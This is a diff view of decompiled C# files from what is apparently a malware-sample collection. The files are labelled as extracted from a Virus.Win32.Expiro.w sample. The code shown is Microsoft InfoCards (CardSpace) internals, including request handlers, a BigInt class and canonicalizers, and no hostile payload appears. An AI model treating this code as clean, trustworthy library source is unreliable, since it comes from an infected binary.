View File
@@ -0,0 +1,25 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.AuditLog
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.InfoCards.Diagnostics;
namespace Microsoft.InfoCards
{
internal static class AuditLog
{
public static void AuditCardWritten() => InfoCardTrace.Audit(EventCode.AUDIT_CARD_WRITTEN);
public static void AuditCardDeletion() => InfoCardTrace.Audit(EventCode.AUDIT_CARD_DELETE);
public static void AuditCardImport() => InfoCardTrace.Audit(EventCode.AUDIT_CARD_IMPORT);
public static void AuditStoreImport() => InfoCardTrace.Audit(EventCode.AUDIT_STORE_IMPORT);
public static void AuditStoreExport() => InfoCardTrace.Audit(EventCode.AUDIT_STORE_EXPORT);
public static void AuditStoreDeletion() => InfoCardTrace.Audit(EventCode.AUDIT_STORE_DELETE);
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/BeginCreateSecurityTokenRequest.cs
+36
View File
@@ -0,0 +1,36 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.BeginCreateSecurityTokenRequest
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using System;
using System.IO;
namespace Microsoft.InfoCards
{
internal class BeginCreateSecurityTokenRequest : UIAgentAsyncBeginRequest
{
private bool m_discloseOptional;
private TokenFactoryCredential m_credential;
public BeginCreateSecurityTokenRequest(
IntPtr rpcHandle,
Stream inArgs,
Stream outArgs,
ClientUIRequest parent)
: base(rpcHandle, inArgs, outArgs, parent)
{
}
protected override void OnMarshalAsyncInArgs(BinaryReader reader)
{
this.m_discloseOptional = reader.ReadBoolean();
this.m_credential = TokenFactoryCredential.CreateFrom(reader, (UIAgentRequest) this, this.ParentRequest.UserLanguage);
}
protected override object AsyncExecute(AsyncParams asyncParam) => (object) ((GetTokenRequest) this.ParentRequest).CreateSecurityToken(this.m_credential, this.m_discloseOptional);
protected override void AsyncCancel() => ((GetTokenRequest) this.ParentRequest).CancelCreateSecurityToken();
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/BeginGetFileNameFromUserRequest.cs
+72
View File
@@ -0,0 +1,72 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.BeginGetFileNameFromUserRequest
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.InfoCards.Diagnostics;
using System;
using System.IO;
namespace Microsoft.InfoCards
{
internal class BeginGetFileNameFromUserRequest : UIAgentAsyncBeginRequest
{
private bool m_getContent;
private string m_arguments;
public BeginGetFileNameFromUserRequest(
IntPtr rpcHandle,
Stream inArgs,
Stream outArgs,
ClientUIRequest parent)
: base(rpcHandle, inArgs, outArgs, parent)
{
}
protected override void OnMarshalAsyncInArgs(BinaryReader reader)
{
this.m_getContent = reader.ReadBoolean();
this.m_arguments = Utility.DeserializeString(reader);
}
protected override object AsyncExecute(AsyncParams asyncParams)
{
uint num = 0;
string empty = string.Empty;
GetFileNameResult getFileNameResult = new GetFileNameResult();
using (new SystemIdentity(true))
num = NativeMcppMethods.CreateAndWaitForFileOpenDialogWrapper(this.m_arguments, this.RequestorIdentity, this.ParentRequest.CallerPid, ref empty);
if (num == 0U)
{
try
{
getFileNameResult.FileName = empty;
if (this.m_getContent)
{
if (!string.IsNullOrEmpty(empty))
{
FileInfo fileInfo = new FileInfo(empty);
using (FileStream fileStream = File.OpenRead(empty))
{
BinaryReader binaryReader = (BinaryReader) new InfoCardBinaryReader((Stream) fileStream);
getFileNameResult.FileContent = binaryReader.ReadBytes((int) fileInfo.Length);
}
}
}
}
catch (Exception ex)
{
if (!InfoCardTrace.IsFatal(ex))
throw InfoCardTrace.ThrowHelperError((Exception) new FileAccessException(SR.GetString("ServiceInaccessibleFile"), ex));
throw;
}
}
return (object) getFileNameResult;
}
protected override void AsyncCancel()
{
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/BeginSelectCardRequest.cs
+49
View File
@@ -0,0 +1,49 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.BeginSelectCardRequest
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using System;
using System.IO;
namespace Microsoft.InfoCards
{
internal class BeginSelectCardRequest : UIAgentAsyncBeginRequest
{
private InfoCard m_card;
public BeginSelectCardRequest(
IntPtr rpcHandle,
Stream inArgs,
Stream outArgs,
ClientUIRequest parent)
: base(rpcHandle, inArgs, outArgs, parent)
{
}
protected override void OnMarshalAsyncInArgs(BinaryReader reader)
{
this.m_card = new InfoCard(reader.BaseStream);
this.m_card.GetExtendedInformation().Deserialize(reader.BaseStream);
this.m_card.GetRPIdentityRequirement().Deserialize(reader.BaseStream);
this.m_card.GetClaims().Deserialize(reader.BaseStream);
StoreConnection connection = StoreConnection.GetConnection();
try
{
InfoCardMasterKey masterKey = this.m_card.GetMasterKey(connection);
if (!this.m_card.IsPinProtected)
return;
masterKey.Decrypt(masterKey.GetPinHelper(this.m_card.Pin));
}
finally
{
connection.Close();
}
}
protected override object AsyncExecute(AsyncParams asyncParam) => (object) ((GetTokenRequest) this.ParentRequest).SelectCard(this.m_card, this.m_card.IsSelfIssued);
protected override void AsyncCancel() => ((GetTokenRequest) this.ParentRequest).CancelSelectCard();
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/BigInt.cs
+400
View File
@@ -0,0 +1,400 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.BigInt
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.InfoCards.Diagnostics;
using System;
namespace Microsoft.InfoCards
{
internal sealed class BigInt
{
private const int m_maxbytes = 128;
private const int m_base = 256;
private byte[] m_elements;
private int m_size;
private static readonly char[] decValues = new char[10]
{
'0',
'1',
'2',
'3',
'4',
'5',
'6',
'7',
'8',
'9'
};
internal BigInt() => this.m_elements = new byte[128];
internal BigInt(byte[] b)
{
this.m_elements = new byte[128];
Array.Copy((Array) b, (Array) this.m_elements, b.Length);
this.m_size = b.Length;
}
internal BigInt(byte b)
{
this.m_elements = new byte[128];
this.SetDigit(0, b);
}
internal int Size
{
get => this.m_size;
set
{
this.m_size = value;
if (value > 128)
this.m_size = 128;
if (value >= 0)
return;
this.m_size = 0;
}
}
internal byte GetDigit(int index) => index < 0 || index >= this.m_size ? (byte) 0 : this.m_elements[index];
internal void SetDigit(int index, byte digit)
{
if (index < 0 || index >= 128)
return;
this.m_elements[index] = digit;
if (index >= this.m_size && digit != (byte) 0)
this.m_size = index + 1;
if (index != this.m_size - 1 || digit != (byte) 0)
return;
--this.m_size;
}
internal void SetDigit(int index, byte digit, ref int size)
{
if (index < 0 || index >= 128)
return;
this.m_elements[index] = digit;
if (index >= size && digit != (byte) 0)
size = index + 1;
if (index != size - 1 || digit != (byte) 0)
return;
--size;
}
public static bool operator <(BigInt value1, BigInt value2)
{
if (value1 == (BigInt) null)
return true;
if (value2 == (BigInt) null)
return false;
int size1 = value1.Size;
int size2 = value2.Size;
if (size1 != size2)
return size1 < size2;
while (size1-- > 0)
{
if ((int) value1.m_elements[size1] != (int) value2.m_elements[size1])
return (int) value1.m_elements[size1] < (int) value2.m_elements[size1];
}
return false;
}
public static bool operator >(BigInt value1, BigInt value2)
{
if (value1 == (BigInt) null)
return false;
if (value2 == (BigInt) null)
return true;
int size1 = value1.Size;
int size2 = value2.Size;
if (size1 != size2)
return size1 > size2;
while (size1-- > 0)
{
if ((int) value1.m_elements[size1] != (int) value2.m_elements[size1])
return (int) value1.m_elements[size1] > (int) value2.m_elements[size1];
}
return false;
}
public static bool operator ==(BigInt value1, BigInt value2)
{
if ((object) value1 == null)
return (object) value2 == null;
if ((object) value2 == null)
return (object) value1 == null;
int size1 = value1.Size;
int size2 = value2.Size;
if (size1 != size2)
return false;
for (int index = 0; index < size1; ++index)
{
if ((int) value1.m_elements[index] != (int) value2.m_elements[index])
return false;
}
return true;
}
public static bool operator !=(BigInt value1, BigInt value2) => !(value1 == value2);
public override bool Equals(object obj)
{
BigInt bigInt = obj as BigInt;
return (BigInt) null != bigInt && bigInt == this;
}
public override int GetHashCode()
{
int hashCode = 0;
for (int index = 0; index < this.m_size; ++index)
hashCode += (int) this.GetDigit(index);
return hashCode;
}
internal static void Add(BigInt a, byte b, ref BigInt c)
{
byte digit = b;
int size1 = a.Size;
int size2 = 0;
for (int index = 0; index < size1; ++index)
{
int num = (int) a.GetDigit(index) + (int) digit;
c.SetDigit(index, (byte) (num & (int) byte.MaxValue), ref size2);
digit = (byte) (num >> 8 & (int) byte.MaxValue);
}
if (digit != (byte) 0)
c.SetDigit(a.Size, digit, ref size2);
c.Size = size2;
}
internal static void Negate(ref BigInt a)
{
int size = 0;
for (int index = 0; index < 128; ++index)
a.SetDigit(index, (byte) ((uint) ~a.GetDigit(index) & (uint) byte.MaxValue), ref size);
for (int index = 0; index < 128; ++index)
{
a.SetDigit(index, (byte) ((uint) a.GetDigit(index) + 1U), ref size);
if (((int) a.GetDigit(index) & (int) byte.MaxValue) == 0)
a.SetDigit(index, (byte) ((uint) a.GetDigit(index) & (uint) byte.MaxValue), ref size);
else
break;
}
a.Size = size;
}
internal static void Subtract(BigInt a, BigInt b, ref BigInt c)
{
byte num1 = 0;
if (a < b)
{
BigInt.Subtract(b, a, ref c);
BigInt.Negate(ref c);
}
else
{
int size1 = a.Size;
int size2 = 0;
for (int index = 0; index < size1; ++index)
{
int num2 = (int) a.GetDigit(index) - (int) b.GetDigit(index) - (int) num1;
num1 = (byte) 0;
if (num2 < 0)
{
num2 += 256;
num1 = (byte) 1;
}
c.SetDigit(index, (byte) (num2 & (int) byte.MaxValue), ref size2);
}
c.Size = size2;
}
}
private void Multiply(int b)
{
if (b == 0)
{
this.Clear();
}
else
{
int num1 = 0;
int size1 = this.Size;
int size2 = 0;
for (int index = 0; index < size1; ++index)
{
int num2 = b * (int) this.GetDigit(index) + num1;
num1 = num2 / 256;
this.SetDigit(index, (byte) (num2 % 256), ref size2);
}
if (num1 != 0)
{
byte[] bytes = BitConverter.GetBytes(num1);
for (int index = 0; index < bytes.Length; ++index)
this.SetDigit(size1 + index, bytes[index], ref size2);
}
this.Size = size2;
}
}
private static void Multiply(BigInt a, int b, ref BigInt c)
{
if (b == 0)
{
c.Clear();
}
else
{
int num1 = 0;
int size1 = a.Size;
int size2 = 0;
for (int index = 0; index < size1; ++index)
{
int num2 = b * (int) a.GetDigit(index) + num1;
num1 = num2 / 256;
c.SetDigit(index, (byte) (num2 % 256), ref size2);
}
if (num1 != 0)
{
byte[] bytes = BitConverter.GetBytes(num1);
for (int index = 0; index < bytes.Length; ++index)
c.SetDigit(size1 + index, bytes[index], ref size2);
}
c.Size = size2;
}
}
private void Divide(int b)
{
int num1 = 0;
int size1 = this.Size;
int size2 = 0;
while (size1-- > 0)
{
int num2 = 256 * num1 + (int) this.GetDigit(size1);
num1 = num2 % b;
this.SetDigit(size1, (byte) (num2 / b), ref size2);
}
this.Size = size2;
}
internal static void Divide(
BigInt numerator,
BigInt denominator,
ref BigInt quotient,
ref BigInt remainder)
{
if (numerator < denominator)
{
quotient.Clear();
remainder.CopyFrom(numerator);
}
else if (numerator == denominator)
{
quotient.Clear();
quotient.SetDigit(0, (byte) 1);
remainder.Clear();
}
else
{
BigInt c1 = new BigInt();
c1.CopyFrom(numerator);
BigInt a = new BigInt();
a.CopyFrom(denominator);
uint num = 0;
while (a.Size < c1.Size)
{
a.Multiply(256);
++num;
}
if (a > c1)
{
a.Divide(256);
--num;
}
BigInt c2 = new BigInt();
quotient.Clear();
for (int index = 0; (long) index <= (long) num; ++index)
{
int b = (c1.Size == a.Size ? (int) c1.GetDigit(c1.Size - 1) : 256 * (int) c1.GetDigit(c1.Size - 1) + (int) c1.GetDigit(c1.Size - 2)) / (int) a.GetDigit(a.Size - 1);
if (b >= 256)
b = (int) byte.MaxValue;
BigInt.Multiply(a, b, ref c2);
while (c2 > c1)
{
--b;
BigInt.Multiply(a, b, ref c2);
}
quotient.Multiply(256);
BigInt.Add(quotient, (byte) b, ref quotient);
BigInt.Subtract(c1, c2, ref c1);
a.Divide(256);
}
remainder.CopyFrom(c1);
}
}
internal void CopyFrom(BigInt a)
{
Array.Copy((Array) a.m_elements, (Array) this.m_elements, 128);
this.m_size = a.m_size;
}
internal bool IsZero()
{
for (int index = 0; index < this.m_size; ++index)
{
if (this.m_elements[index] != (byte) 0)
return false;
}
return true;
}
internal byte[] ToByteArray()
{
byte[] destinationArray = new byte[this.Size];
Array.Copy((Array) this.m_elements, (Array) destinationArray, this.Size);
return destinationArray;
}
internal void Clear() => this.m_size = 0;
internal void FromDecimal(string decNum)
{
BigInt c1 = new BigInt();
BigInt c2 = new BigInt();
int length = decNum.Length;
for (int index = 0; index < length; ++index)
{
if (decNum[index] > '9' || decNum[index] < '0')
throw InfoCardTrace.ThrowHelperError((Exception) new FormatException());
BigInt.Multiply(c1, 10, ref c2);
BigInt.Add(c2, (byte) ((uint) decNum[index] - 48U), ref c1);
}
this.CopyFrom(c1);
}
internal string ToDecimal()
{
BigInt denominator = new BigInt((byte) 10);
BigInt numerator = new BigInt();
BigInt quotient = new BigInt();
BigInt remainder = new BigInt();
numerator.CopyFrom(this);
char[] chArray = new char[8 * this.m_size / 3];
int length = 0;
do
{
BigInt.Divide(numerator, denominator, ref quotient, ref remainder);
chArray[length++] = BigInt.decValues[(int) remainder.m_elements[0]];
numerator.CopyFrom(quotient);
}
while (!quotient.IsZero());
Array.Reverse((Array) chArray, 0, length);
return new string(chArray, 0, length);
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/BrowserPolicyValidator.cs
+26
View File
@@ -0,0 +1,26 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.BrowserPolicyValidator
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
namespace Microsoft.InfoCards
{
internal class BrowserPolicyValidator : PolicyValidator
{
public BrowserPolicyValidator(InfoCardPolicy policy)
: base(policy)
{
}
public override void Validate()
{
this.ValidateClaims();
this.ValidateNonWhiteListElements();
this.ValidateRequestType();
this.ValidateTokenType();
this.ValidatePrivacyVersion();
this.ValidateRecipients();
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/CancelAsyncOperationRequest.cs
+39
View File
@@ -0,0 +1,39 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.CancelAsyncOperationRequest
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.InfoCards.Diagnostics;
using System;
using System.IO;
using System.Text;
namespace Microsoft.InfoCards
{
internal class CancelAsyncOperationRequest : UIAgentRequest
{
private int m_asyncHandle;
public CancelAsyncOperationRequest(
IntPtr rpcHandle,
Stream inArgs,
Stream outArgs,
ClientUIRequest parent)
: base(rpcHandle, inArgs, outArgs, parent)
{
}
protected override void OnMarshalInArgs()
{
this.m_asyncHandle = new InfoCardBinaryReader(this.InArgs, Encoding.Unicode).ReadInt32();
InfoCardTrace.ThrowInvalidArgumentConditional(0 == this.m_asyncHandle, "asyncHandle");
}
protected override void OnMarshalOutArgs()
{
}
protected override void OnProcess() => this.ParentRequest.CancelAsyncOp(this.m_asyncHandle);
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/Canonicalizers.cs
+248
View File
@@ -0,0 +1,248 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.Canonicalizers
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.InfoCards.Diagnostics;
using System;
using System.Collections.Generic;
using System.Globalization;
using System.Text;
namespace Microsoft.InfoCards
{
internal sealed class Canonicalizers
{
private static ICanonicalizer s_binary;
private static ICanonicalizer s_caseInsensitiveWithHashing;
private static ICanonicalizer s_caseSensitiveWithHashing;
private static ICanonicalizer s_binaryWithHashing;
private Canonicalizers()
{
}
public static ICanonicalizer CaseInsensitiveWithHashing
{
get
{
if (Canonicalizers.s_caseInsensitiveWithHashing == null)
Canonicalizers.s_caseInsensitiveWithHashing = (ICanonicalizer) new Canonicalizers.CaseInsensitiveCanonicalizer(true, Encoding.Unicode, CultureInfo.InvariantCulture);
return Canonicalizers.s_caseInsensitiveWithHashing;
}
}
public static ICanonicalizer CaseSensitiveWithHashing
{
get
{
if (Canonicalizers.s_caseSensitiveWithHashing == null)
Canonicalizers.s_caseSensitiveWithHashing = (ICanonicalizer) new Canonicalizers.CaseSensitiveCanonicalizer(true, Encoding.Unicode, CultureInfo.InvariantCulture);
return Canonicalizers.s_caseSensitiveWithHashing;
}
}
public static ICanonicalizer Binary
{
get
{
if (Canonicalizers.s_binary == null)
Canonicalizers.s_binary = (ICanonicalizer) new Canonicalizers.BinaryCanonicalizer(false);
return Canonicalizers.s_binary;
}
}
public static ICanonicalizer BinaryWithHashing
{
get
{
if (Canonicalizers.s_binaryWithHashing == null)
Canonicalizers.s_binaryWithHashing = (ICanonicalizer) new Canonicalizers.BinaryCanonicalizer(true);
return Canonicalizers.s_binaryWithHashing;
}
}
private delegate byte[] CanonicalizeObjectCallback(object dataToHash);
private abstract class CanonicalizerBase : ICanonicalizer
{
private bool m_hashValue;
public CanonicalizerBase(bool hashValue) => this.m_hashValue = hashValue;
public byte[] Canonicalize(object obj)
{
byte[] dataToHash = obj != null ? this.GetRawForm(obj) : throw InfoCardTrace.ThrowHelperArgumentNull(nameof (obj));
if (!this.m_hashValue)
return dataToHash;
byte[] data = new byte[HashUtility.HashBufferLength];
HashUtility.SetHashValue(data, 0, dataToHash);
return data;
}
public abstract bool CanCanonicalize(object obj);
protected abstract byte[] GetRawForm(object obj);
}
private class BinaryCanonicalizer : Canonicalizers.CanonicalizerBase
{
private Dictionary<Type, Canonicalizers.CanonicalizeObjectCallback> m_canonicalizers;
public BinaryCanonicalizer(bool hashValue)
: base(hashValue)
{
this.m_canonicalizers = new Dictionary<Type, Canonicalizers.CanonicalizeObjectCallback>();
this.CreateCanonicalizers();
}
public override bool CanCanonicalize(object obj) => obj != null ? this.m_canonicalizers.ContainsKey(obj.GetType()) : throw InfoCardTrace.ThrowHelperArgumentNull(nameof (obj));
private void CreateCanonicalizers()
{
this.m_canonicalizers.Add(typeof (short), new Canonicalizers.CanonicalizeObjectCallback(this.CanonicalizeInt16));
this.m_canonicalizers.Add(typeof (ushort), new Canonicalizers.CanonicalizeObjectCallback(this.CanonicalizeUInt16));
this.m_canonicalizers.Add(typeof (int), new Canonicalizers.CanonicalizeObjectCallback(this.CanonicalizeInt32));
this.m_canonicalizers.Add(typeof (uint), new Canonicalizers.CanonicalizeObjectCallback(this.CanonicalizeUInt32));
this.m_canonicalizers.Add(typeof (long), new Canonicalizers.CanonicalizeObjectCallback(this.CanonicalizeInt64));
this.m_canonicalizers.Add(typeof (ulong), new Canonicalizers.CanonicalizeObjectCallback(this.CanonicalizeUInt64));
this.m_canonicalizers.Add(typeof (byte), new Canonicalizers.CanonicalizeObjectCallback(this.CanonicalizeByte));
this.m_canonicalizers.Add(typeof (byte[]), new Canonicalizers.CanonicalizeObjectCallback(this.CanonicalizeByteArray));
this.m_canonicalizers.Add(typeof (string), new Canonicalizers.CanonicalizeObjectCallback(this.CanonicalizeString));
this.m_canonicalizers.Add(typeof (Guid), new Canonicalizers.CanonicalizeObjectCallback(this.CanonicalizeGuid));
this.m_canonicalizers.Add(typeof (GlobalId), new Canonicalizers.CanonicalizeObjectCallback(this.CanonicalizeGlobalId));
}
protected override byte[] GetRawForm(object obj) => this.m_canonicalizers[obj.GetType()](obj);
private byte[] CanonicalizeGlobalId(object data) => data != null ? ((Guid) (GlobalId) data).ToByteArray() : throw InfoCardTrace.ThrowHelperArgumentNull(nameof (data));
private byte[] CanonicalizeGuid(object data) => data != null ? ((Guid) data).ToByteArray() : throw InfoCardTrace.ThrowHelperArgumentNull(nameof (data));
private unsafe byte[] CanonicalizeInt16(object data)
{
short num = data != null ? (short) data : throw InfoCardTrace.ThrowHelperArgumentNull(nameof (data));
byte[] numArray = new byte[2];
fixed (byte* numPtr = &numArray[0])
*(short*) numPtr = num;
return numArray;
}
private unsafe byte[] CanonicalizeUInt16(object data)
{
ushort num = data != null ? (ushort) data : throw InfoCardTrace.ThrowHelperArgumentNull(nameof (data));
byte[] numArray = new byte[2];
fixed (byte* numPtr = &numArray[0])
*(short*) numPtr = (short) num;
return numArray;
}
private unsafe byte[] CanonicalizeInt32(object data)
{
int num = data != null ? (int) data : throw InfoCardTrace.ThrowHelperArgumentNull(nameof (data));
byte[] numArray = new byte[4];
fixed (byte* numPtr = &numArray[0])
*(int*) numPtr = num;
return numArray;
}
private unsafe byte[] CanonicalizeUInt32(object data)
{
uint num = data != null ? (uint) data : throw InfoCardTrace.ThrowHelperArgumentNull(nameof (data));
byte[] numArray = new byte[4];
fixed (byte* numPtr = &numArray[0])
*(int*) numPtr = (int) num;
return numArray;
}
private unsafe byte[] CanonicalizeInt64(object data)
{
long num = data != null ? (long) data : throw InfoCardTrace.ThrowHelperArgumentNull(nameof (data));
byte[] numArray = new byte[8];
fixed (byte* numPtr = &numArray[0])
*(long*) numPtr = num;
return numArray;
}
private unsafe byte[] CanonicalizeUInt64(object data)
{
ulong num = data != null ? (ulong) data : throw InfoCardTrace.ThrowHelperArgumentNull(nameof (data));
byte[] numArray = new byte[8];
fixed (byte* numPtr = &numArray[0])
*(long*) numPtr = (long) num;
return numArray;
}
private byte[] CanonicalizeString(object data)
{
string s = data != null ? (string) data : throw InfoCardTrace.ThrowHelperArgumentNull(nameof (data));
return !string.IsNullOrEmpty(s) ? Encoding.Unicode.GetBytes(s) : throw InfoCardTrace.ThrowHelperArgumentNull(nameof (data));
}
private byte[] CanonicalizeByte(object data) => data != null ? new byte[1]
{
(byte) data
} : throw InfoCardTrace.ThrowHelperArgumentNull(nameof (data));
private byte[] CanonicalizeByteArray(object data) => data != null ? (byte[]) data : throw InfoCardTrace.ThrowHelperArgumentNull(nameof (data));
}
private abstract class StringCanonicalizerBase : Canonicalizers.CanonicalizerBase
{
private static readonly Type[] s_validTypes = new Type[2]
{
typeof (string),
typeof (Uri)
};
private Encoding m_encoding;
private CultureInfo m_culture;
protected StringCanonicalizerBase(bool hashValue, Encoding encoding, CultureInfo culture)
: base(hashValue)
{
if (encoding == null)
throw InfoCardTrace.ThrowHelperArgumentNull(nameof (encoding));
this.m_culture = culture != null ? culture : CultureInfo.InvariantCulture;
this.m_encoding = encoding;
}
protected virtual Type[] SupportedTypes => Canonicalizers.StringCanonicalizerBase.s_validTypes;
public CultureInfo Culture => this.m_culture;
public Encoding Encoding => this.m_encoding;
public override bool CanCanonicalize(object obj)
{
if (obj == null)
throw InfoCardTrace.ThrowHelperArgumentNull(nameof (obj));
return this.SupportedTypes != null && -1 != Array.IndexOf<Type>(this.SupportedTypes, obj.GetType());
}
protected override byte[] GetRawForm(object obj) => this.GetBytesFromString(obj.ToString());
protected abstract byte[] GetBytesFromString(string data);
}
private class CaseSensitiveCanonicalizer : Canonicalizers.StringCanonicalizerBase
{
public CaseSensitiveCanonicalizer(bool hashValue, Encoding encoding, CultureInfo culture)
: base(hashValue, encoding, culture)
{
}
protected override byte[] GetBytesFromString(string data) => this.Encoding.GetBytes(data);
}
private class CaseInsensitiveCanonicalizer : Canonicalizers.StringCanonicalizerBase
{
public CaseInsensitiveCanonicalizer(bool hashValue, Encoding encoding, CultureInfo culture)
: base(hashValue, encoding, culture)
{
}
protected override byte[] GetBytesFromString(string obj) => this.Encoding.GetBytes(this.Culture.TextInfo.ToUpper(obj));
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/CheckStoreFileValidityRequest.cs
+77
View File
@@ -0,0 +1,77 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.CheckStoreFileValidityRequest
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.InfoCards.Diagnostics;
using System;
using System.IO;
using System.Text;
using System.Xml;
using System.Xml.Schema;
namespace Microsoft.InfoCards
{
internal class CheckStoreFileValidityRequest : UIAgentRequest
{
private string m_filename;
private bool m_valid = true;
public CheckStoreFileValidityRequest(
IntPtr rpcHandle,
Stream inArgs,
Stream outArgs,
ClientUIRequest parent)
: base(rpcHandle, inArgs, outArgs, parent)
{
}
protected override void OnInitializeAsSystem() => base.OnInitializeAsSystem();
protected override void OnMarshalInArgs() => this.m_filename = Utility.DeserializeString((BinaryReader) new InfoCardBinaryReader(this.InArgs, Encoding.Unicode));
protected override void OnProcess()
{
try
{
try
{
using (FileStream fileStream = File.OpenRead(this.m_filename))
{
XmlReaderSettings defaultReaderSettings = InfoCardSchemas.CreateDefaultReaderSettings();
defaultReaderSettings.IgnoreWhitespace = false;
using (XmlReader reader = InfoCardSchemas.CreateReader((Stream) fileStream, defaultReaderSettings))
{
if (reader.IsStartElement("EncryptedStore", "http://schemas.xmlsoap.org/ws/2005/05/identity"))
return;
this.m_valid = false;
}
}
}
catch (XmlSchemaValidationException ex)
{
throw InfoCardTrace.ThrowHelperError((Exception) new ImportException(SR.GetString("SchemaValidationFailed"), (Exception) ex));
}
catch (UnauthorizedAccessException ex)
{
throw InfoCardTrace.ThrowHelperError((Exception) new ImportException(SR.GetString("ImportInaccesibleFile"), (Exception) ex));
}
catch (IOException ex)
{
throw InfoCardTrace.ThrowHelperError((Exception) new ImportException(SR.GetString("InvalidImportFile"), (Exception) ex));
}
catch (XmlException ex)
{
throw InfoCardTrace.ThrowHelperError((Exception) new ImportException(SR.GetString("InvalidImportFile"), (Exception) ex));
}
}
catch (ImportException ex)
{
this.m_valid = false;
}
}
protected override void OnMarshalOutArgs() => new BinaryWriter(this.OutArgs).Write(this.m_valid);
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/ClientRequest.cs
+405
View File
@@ -0,0 +1,405 @@
// Decompiled with JetBrains decompiler
